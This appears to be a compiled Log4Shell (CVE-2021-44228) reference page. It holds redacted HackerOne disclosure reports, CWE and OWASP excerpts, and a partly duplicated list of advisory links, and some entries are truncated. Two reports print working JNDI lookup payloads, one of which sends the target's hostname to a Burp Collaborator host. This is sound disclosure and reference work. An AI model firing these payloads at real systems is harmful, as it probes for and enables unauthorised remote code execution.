Greetings from the Department of Defense (DoD),
Thank you for supporting the DoD Vulnerabi
HackerOne
██████████ running a vulnerable log4j
hackerone·2022-01-19·CVSS 10.0
CVE-2021-44228 [CRITICAL] ██████████ running a vulnerable log4j
██████████ running a vulnerable log4j
**Description:**
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
## Impact
Probably arbitrary code execution
## System Host(s)
████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Browse to https://████████/███████https%3A%2F%2F█████████%2F
2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field
3. Enter a random password
4. Submit
Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.
## Suggested Mitigation/Remediation Actions
Update log4j or disable jndi support.
HackerOne
Log4Shell: RCE 0-day exploit on █████████
hackerone·2022-01-03·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4Shell: RCE 0-day exploit on █████████
Log4Shell: RCE 0-day exploit on █████████
Hi team,
log4 shell is recent 0-day exploit it's Java package vulnerable. ██████████ domain is vulnerable
## Impact
RCE
## System Host(s)
█████████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2021-44228
## Steps to Reproduce
1. Go to this url => https://███████/██████=%24%7bjndi%3aldap%3a%2f%2fx%24%7bhostName%7d.LOG45200SSRF.xxxxxx.burpcollaborator.net%2fa%7d
2. paste the poc code on ██████ url parameter
3. like this => https://██████████/██████
4. then burp collaborator received reverse ping back
5. I attached poc videos and photos below
##POC CODE
${jndi:ldap://x${hostName}.log4j.xxxxxxx.burpcollaborator.net/a}
## Suggested Mitigation/Remediation Actions
https://www.lunasec.io/docs/blog/log4j-zero-day/
HackerOne
Log4j RCE on https://judge.me/reviews
hackerone·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4j RCE on https://judge.me/reviews
Log4j RCE on https://judge.me/reviews
Summary:
CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system.
What makes CVE-2021-44228 especially dangerous is the ease of exploitation: even an inexperienced hacker can successfully execute an attack using this vulnerability. According to the researchers, attackers only need to force the application to write just one string to the log, and after that they are able to upload their own code into the application due to the message lookup substitution function.
Supporting Material/References:
Picture and Logs was Uploaded as a proof.
https://www.tenabl
CWE
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
mitre_cwe
CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
The product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.
Frameworks such as Java Server Page (JSP) allow a developer to insert executable expressions within otherwise-static content. When the developer is not aware of the executable nature of these expressions and/or does not disable them, then if an attacker can inject expressions, this could lead to code execution or other unexpected behaviors.
Mo
OWASP
VWAD: Log4Shell sample vulnerable application
owasp_extra·CVSS 10.0
CVE-2021-44228 [CRITICAL] VWAD: Log4Shell sample vulnerable application
# Log4Shell sample vulnerable application
Sample vulnerable application for CVE-2021-44228 (Log4Shell).
## Notes
CVE-2021-44228
**Technology:** Spring Boot, Log4j, Java
**Categories:** free-form, single-player
**Collection:** container
**URL:** https://github.com/christophetd/log4shell-vulnerable-app
CWE
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
mitre_cwe
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data. Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation.
Scope: Access Cont
OWASP
A03:2025 Software Supply Chain Failures
owasp
A03:2025 Software Supply Chain Failures !icon{: style="height:80px;width:80px" align="right"}
# A03:2025 Software Supply Chain Failures {: style="height:80px;width:80px" align="right"}
## Background.
This was top-ranked in the Top 10 community survey with exactly 50% respondents ranking it #1. Since initially appearing in the 2013 Top 10 as "A9 – Using Components with Known Vulnerabilities", the risk has grown in scope to include all supply chain failures, not just ones involving known vulnerabilities. Despite this increased scope, supply chain failures continue to be a challenge to identify with only 11 Common Vulnerability and Exposures (CVEs) having the related CWEs. However, when tested and reported in the contributed data, this category has the highest average incidence rate at 5.19%. The relevant CWEs are *CWE-477: Use of Obsolete Function, CWE-1104: Use of Unmaintained Th
CWE
Dependency on Vulnerable Third-Party Component
mitre_cwe
CWE-1395 Dependency on Vulnerable Third-Party Component
CWE-1395: Dependency on Vulnerable Third-Party Component
The product has a dependency on a third-party component that contains one or more known vulnerabilities.
Many products are large enough or complex enough that part of their functionality uses libraries, modules, or other intellectual property developed by third parties who are not the product creator. For example, even an entire operating system might be from a third-party supplier in some hardware products. Whether open or closed source, these components may contain publicly known vulnerabilities that could be exploited by adversaries to compromise the product.
Modes of Introduction:
Phase: Architecture and Design
Note: The product architect or designer might choose a component that is already known to contain vulnerabilities or
http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.htmlhttp://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Dec/2http://seclists.org/fulldisclosure/2022/Jul/11http://seclists.org/fulldisclosure/2022/Mar/23http://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://www.openwall.com/lists/oss-security/2021/12/10/3http://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2http://www.openwall.com/lists/oss-security/2021/12/14/4http://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://github.com/cisagov/log4j-affected-dbhttps://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/https://logging.apache.org/log4j/2.x/security.htmlhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://security.netapp.com/advisory/ntap-20211210-0007/https://support.apple.com/kb/HT213189https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://twitter.com/kurtseifried/status/1469345530182455296https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://www.debian.org/security/2021/dsa-5020https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.oracle.com/security-alerts/cpujan2022.htmlhttp://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.htmlhttp://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Dec/2http://seclists.org/fulldisclosure/2022/Jul/11http://seclists.org/fulldisclosure/2022/Mar/23http://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://www.openwall.com/lists/oss-security/2021/12/10/3http://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2http://www.openwall.com/lists/oss-security/2021/12/14/4http://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttps://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://github.com/cisagov/log4j-affected-dbhttps://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/https://logging.apache.org/log4j/2.x/security.htmlhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://security.netapp.com/advisory/ntap-20211210-0007/https://support.apple.com/kb/HT213189https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://twitter.com/kurtseifried/status/1469345530182455296https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://www.debian.org/security/2021/dsa-5020https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttps://www.oracle.com/security-alerts/alert-cve-2021-44228.html
+ 3 more references
2021-12-10
Published
2021-12-10
Added to CISA KEV
Exploited in the wild